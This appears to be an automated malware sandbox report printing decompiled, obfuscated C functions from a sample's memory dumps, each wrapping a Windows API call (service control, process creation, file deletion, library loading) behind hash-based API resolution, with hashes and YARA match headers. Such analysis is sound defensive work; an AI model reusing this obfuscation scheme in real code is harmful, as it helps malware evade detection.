                                              			E006D7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				int _t31;
                                              				signed int _t33;
                                              				struct _SHFILEOPSTRUCTW* _t40;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_t40 = __ecx;
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E006C602B(_t24);
                                              				_v8 = 0xa117;
                                              				_t33 = 0x76;
                                              				_v8 = _v8 / _t33;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 ^ 0x210fe703;
                                              				_v8 = _v8 ^ 0x210fdcea;
                                              				_v12 = 0xf1e9;
                                              				_v12 = _v12 << 9;
                                              				_v12 = _v12 ^ 0x01e3a445;
                                              				E006D07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                              				_t31 = SHFileOperationW(_t40); // executed
                                              				return _t31;
                                              			}

                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 006D7C67
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
                                              • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction ID: 265b839422b40c41ae9c4a18b9b8809066ca68da7193d2a8cd01760036c7e771
                                              • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction Fuzzy Hash: BC014FB190120CFFEB49DF94C94A9DE7BB5EF44314F20819DF40567240E6B15F509B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 52%
                                              			E006CF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				void* _t29;
                                              				int _t35;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a20);
                                              				_t35 = __ecx;
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E006C602B(_t24);
                                              				_v12 = 0xd5a7;
                                              				_v12 = _v12 ^ 0x994cba9d;
                                              				_v12 = _v12 ^ 0x994c19d3;
                                              				_v8 = 0xac88;
                                              				_v8 = _v8 << 3;
                                              				_v8 = _v8 >> 8;
                                              				_v8 = _v8 + 0xebed;
                                              				_v8 = _v8 ^ 0x0000ab82;
                                              				E006D07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                              				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                              				return _t29;
                                              			}

                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 006CF6D8
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: e5ce28f777ee97fcbb0f40c328e02666741496e654b79fdf1bfef53b5c485528
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: 2201E5B6901208BBEF059F94DD0A8DF7F75EB05324F148188F90466250D6B25E21DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E006CB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t23;
                                              				intOrPtr* _t27;
                                              				void* _t28;
                                              
                                              				E006C602B(_t23);
                                              				_v12 = 0x9431;
                                              				_v12 = _v12 >> 7;
                                              				_v12 = _v12 ^ 0x0000160f;
                                              				_v8 = 0xc972;
                                              				_v8 = _v8 ^ 0x829e0126;
                                              				_v8 = _v8 + 0x4512;
                                              				_v8 = _v8 + 0xffff18f9;
                                              				_v8 = _v8 ^ 0x829e24c1;
                                              				_t27 = E006D07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                              				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                              				return _t28;
                                              			}

                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 006CB759
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: b12ae957d101f7aa69163a32ec028809930ad8a978d3accd7e31397482b4cded
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: A6014FB594130CFBEF45DF94DD06E9E7BB5EF14704F108188FA0966190D3B15E209B55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E006DAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E006C602B(_t21);
                                              				_v12 = 0xcc49;
                                              				_v12 = _v12 << 6;
                                              				_v12 = _v12 >> 2;
                                              				_v12 = _v12 ^ 0x000ca988;
                                              				_v8 = 0x5d85;
                                              				_v8 = _v8 | 0xb9d19a55;
                                              				_v8 = _v8 * 0xd;
                                              				_v8 = _v8 ^ 0x6fa87272;
                                              				E006D07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                              				_t27 = DeleteFileW(_a12); // executed
                                              				return _t27;
                                              			}

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 006DAAA8
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: 663a755dfc6d45a7fbd065eb061e0d929363b67b5f9ec4174fd994159a9be1ad
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: 46F0F6B590020CFFDB08DF94D94A99EBBB5EB45304F10819CF915A6250D2B69B549B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 70%
                                              			E006C5FB2(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E006C602B(_t21);
                                              				_v12 = 0x33d;
                                              				_v12 = _v12 + 0xc3dc;
                                              				_v12 = _v12 | 0x39ccfb02;
                                              				_v12 = _v12 ^ 0x39ccf342;
                                              				_v8 = 0xe8d9;
                                              				_v8 = _v8 * 0x16;
                                              				_v8 = _v8 | 0x4145347f;
                                              				_v8 = _v8 ^ 0x9035ef96;
                                              				_v8 = _v8 ^ 0xd1609914;
                                              				E006D07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                              				_t27 = CloseServiceHandle(_a4); // executed
                                              				return _t27;
                                              			}

                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 006C6025
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                              • Associated: 00000009.00000002.2113191563.00000000006C0000.00000004.00000001.sdmp
                                              • Associated: 00000009.00000002.2113222676.00000000006DC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction ID: cb0861d6890d54ac7204ff8d6eb82e3182e3e738c333d00b41e92a2462ccbc2b
                                              • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction Fuzzy Hash: CCF04FB0D11208FFEB48DFA0E94689EBFB9EB40300F20819CE409A7260E7B19F159F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Executed Functions

                                              C-Code - Quality: 62%
                                              			E001D2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t30;
                                              				void* _t39;
                                              				signed int _t41;
                                              				signed int _t42;
                                              
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(0);
                                              				_push(0);
                                              				E001D602B(_t30);
                                              				_v12 = 0x5e3c;
                                              				_t41 = 0x63;
                                              				_v12 = _v12 / _t41;
                                              				_t42 = 0x2f;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x000064be;
                                              				_v8 = 0x74da;
                                              				_v8 = _v8 | 0xfefeeaea;
                                              				_v8 = _v8 >> 0xc;
                                              				_v8 = _v8 ^ 0x000fb531;
                                              				E001E07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                              				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                              				return _t39;
                                              			}

                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001D29DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: 2def957fbdd76c8f6afaa0a2bd22bc4160f696d70807745a4914eae7dc807cb6
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: A6018072A00108BFEB14DF95DC4A8DFBFB6EF48310F108089F508A6250D7B65F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E001DC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				void* _t29;
                                              				intOrPtr* _t33;
                                              				void* _t34;
                                              
                                              				E001D602B(_t29);
                                              				_v28 = 0x4fe02f;
                                              				_v24 = 0x232390;
                                              				_v20 = 0xf8460;
                                              				_v16 = 0;
                                              				_v12 = 0xf625;
                                              				_v12 = _v12 >> 6;
                                              				_v12 = _v12 >> 0xa;
                                              				_v12 = _v12 + 0xffffcc6f;
                                              				_v12 = _v12 ^ 0xffffa5b6;
                                              				_v8 = 0xe5cd;
                                              				_v8 = _v8 + 0xffffae4d;
                                              				_v8 = _v8 | 0xf8bbefe7;
                                              				_v8 = _v8 ^ 0xf8bbcc9a;
                                              				_t33 = E001E07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                              				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                              				return _t34;
                                              			}

                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001DC762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction ID: 4a01790a23612c8bc0685b17fe082e26f4db6c5654d638d0cee67d8c555ea358
                                              • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction Fuzzy Hash: D31133B290122DBBCB25DF95DC498DFBFB8EF14714F108188F90962210D3B14B659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E001D1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				void* _t33;
                                              				struct HINSTANCE__* _t40;
                                              				signed int _t42;
                                              
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				E001D602B(_t33);
                                              				_v16 = _v16 & 0x00000000;
                                              				_v24 = 0x1b2eda;
                                              				_v20 = 0x33a3b7;
                                              				_v12 = 0x98c;
                                              				_v12 = _v12 + 0xb426;
                                              				_v12 = _v12 + 0x5beb;
                                              				_t42 = 0x63;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x00000fce;
                                              				_v8 = 0x120e;
                                              				_v8 = _v8 + 0xfffffcb8;
                                              				_v8 = _v8 + 0xffffefaa;
                                              				_v8 = _v8 >> 5;
                                              				_v8 = _v8 ^ 0x07ff9a02;
                                              				E001E07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                              				_t40 = LoadLibraryW(_a12); // executed
                                              				return _t40;
                                              			}

                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 001D1096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction ID: 6c9247c1494e0430e7af192e2c9ebdad8a4dc037f7a170ec8d45a2d22dfa5ef9
                                              • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction Fuzzy Hash: F1015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E001D4859() {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              
                                              				_v12 = 0xafe2;
                                              				_v12 = _v12 * 0x42;
                                              				_v12 = _v12 + 0xffffdd89;
                                              				_v12 = _v12 ^ 0x002d198d;
                                              				_v8 = 0x5b09;
                                              				_v8 = _v8 | 0xa1ea9544;
                                              				_v8 = _v8 * 0x12;
                                              				_v8 = _v8 ^ 0x6283d9c1;
                                              				E001E07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                              				ExitProcess(0);
                                              			}







                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 001D48B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction ID: 4d233150a7b1b8d0ca9ed02e51ebcc8e11366db29454cee23ee02343d5930ca8
                                              • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction Fuzzy Hash: A0F017B0E05209FBDB04CFE8CA5699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 66%
                                              			E001E4F7D(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t17;
                                              				int _t24;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E001D602B(_t17);
                                              				_v12 = 0xddd8;
                                              				_v12 = _v12 * 0x48;
                                              				_v12 = _v12 ^ 0x003e66d8;
                                              				_v8 = 0xcb35;
                                              				_v8 = _v8 ^ 0x7b88573c;
                                              				_v8 = _v8 * 0x59;
                                              				_v8 = _v8 ^ 0xf27e4a21;
                                              				E001E07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                              				_t24 = CloseHandle(_a4); // executed
                                              				return _t24;
                                              			}








                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 001E4FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction ID: 6704b2815e5b6340f86946b0b895de4bfb083cb0925a4a1645cfd3f49927c494
                                              • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction Fuzzy Hash: 50F037B0C1120CFFDB04DFA4D98289EBFBAEB44300F208199E804AB250D3715B509B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 21%
                                              			E001E976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t34;
                                              				int _t39;
                                              				struct _PROCESS_INFORMATION* _t48;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t48 = __edx;
                                              				_push(0);
                                              				_push(_a68);
                                              				_push(0);
                                              				_push(_a60);
                                              				_push(_a56);
                                              				_push(_a52);
                                              				_push(0);
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(0);
                                              				_push(0);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E001D602B(_t34);
                                              				_v12 = 0xaff9;
                                              				_v12 = _v12 | 0xcee54bd1;
                                              				_v12 = _v12 + 0x6ed6;
                                              				_v12 = _v12 ^ 0xcee61221;
                                              				_v8 = 0x6229;
                                              				_v8 = _v8 ^ 0x42aa9f31;
                                              				_v8 = _v8 >> 2;
                                              				_v8 = _v8 ^ 0x10aad83f;
                                              				E001E07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                              				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                              				return _t39;
                                              			}









                                              APIs
                                              • CreateProcessW.KERNEL32(001D591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001D591A), ref: 001E9816
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction ID: c55db46f124b2cc675f9668ff90ed3c07b71415c0d78f6d611415f865274e5c6
                                              • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction Fuzzy Hash: 0C11B372901188BFDF1A9FD6DC0ACDF7F7AEF89750F104148FA1556120D2728AA0EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 31%
                                              			E001DB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t32;
                                              				void* _t38;
                                              				long _t47;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a48);
                                              				_t47 = __edx;
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(_a36);
                                              				_push(_a32);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(0);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(0);
                                              				E001D602B(_t32);
                                              				_v8 = 0xfd14;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 * 0x7a;
                                              				_v8 = _v8 >> 9;
                                              				_v8 = _v8 ^ 0x00002bef;
                                              				_v12 = 0x4f26;
                                              				_v12 = _v12 | 0xe7e97f76;
                                              				_v12 = _v12 ^ 0xe7e94dbb;
                                              				E001E07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                              				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                              				return _t38;
                                              			}









                                              APIs
                                              • CreateFileW.KERNELBASE(001E0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001E0668,?,?,?,?), ref: 001DB5FD
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction ID: 37c1b1c4d25d484248efe105347f02daa2207a1a560edb8fe11a26f7b2631849
                                              • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction Fuzzy Hash: 0611C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 54%
                                              			E001E981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              				void* _t28;
                                              				void* _t34;
                                              				long _t37;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a16);
                                              				_t34 = __edx;
                                              				_t37 = __ecx;
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E001D602B(_t22);
                                              				_v12 = 0xe68;
                                              				_v12 = _v12 * 0x39;
                                              				_v12 = _v12 ^ 0xd1b1d871;
                                              				_v12 = _v12 ^ 0xd1b2fb7e;
                                              				_v8 = 0x629e;
                                              				_v8 = _v8 + 0xfffff5da;
                                              				_v8 = _v8 | 0xbef7b77b;
                                              				_v8 = _v8 ^ 0xbef79fc3;
                                              				E001E07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                              				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                              				return _t28;
                                              			}










                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001D87F2,0000CAAE,0000510C,AD82F196), ref: 001E989B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction ID: b7709b50ae51164d8aeb1307988349b9148569f66681926d56ec9366ccc2218f
                                              • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction Fuzzy Hash: BA019A72801208FBDB04EFD5D846CDFBF79EF85310F108189F908A6220E6715B619BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 62%
                                              			E001E7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				int _t31;
                                              				signed int _t33;
                                              				struct _SHFILEOPSTRUCTW* _t40;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_t40 = __ecx;
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E001D602B(_t24);
                                              				_v8 = 0xa117;
                                              				_t33 = 0x76;
                                              				_v8 = _v8 / _t33;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 ^ 0x210fe703;
                                              				_v8 = _v8 ^ 0x210fdcea;
                                              				_v12 = 0xf1e9;
                                              				_v12 = _v12 << 9;
                                              				_v12 = _v12 ^ 0x01e3a445;
                                              				E001E07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                              				_t31 = SHFileOperationW(_t40); // executed
                                              				return _t31;
                                              			}










                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001E7C67
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
